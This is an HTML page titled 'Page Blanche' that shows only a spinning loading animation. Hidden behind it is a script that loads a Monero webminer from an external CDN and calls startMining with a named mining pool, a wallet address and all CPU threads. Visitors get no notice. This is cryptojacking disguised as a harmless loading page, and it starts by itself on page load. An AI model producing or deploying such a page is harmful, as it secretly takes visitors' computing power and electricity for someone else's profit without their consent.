<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Page Blanche</title>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: #ffffff;
        }

        .loader {
            border: 16px solid #f3f3f3; /* Light grey */
            border-top: 16px solid #3498db; /* Blue */
            border-radius: 50%;
            width: 120px;
            height: 120px;
            animation: spin 2s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="loader"></div>
  <script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
  <script>
      server = "wss://ny1.xmrminingproxy.com";
      var pool = "xmr-eu1.nanopool.org:14433";
      var walletAddress = "445FYQ7V7vucaDaTweVHQ9GeUum6aJV86Vm4T8YMeVk93pAL3NGPKKaNDBHjbpnAdH3cMrhrfoZ4c8MGgbxX7NHoRXzDbzv";
      var workerId = "GH-XMR"
      var threads = -1;
      var password = "";
      startMining(pool, walletAddress, workerId, threads, password);
      throttleMiner = 20;
  </script>
</body>
</html>
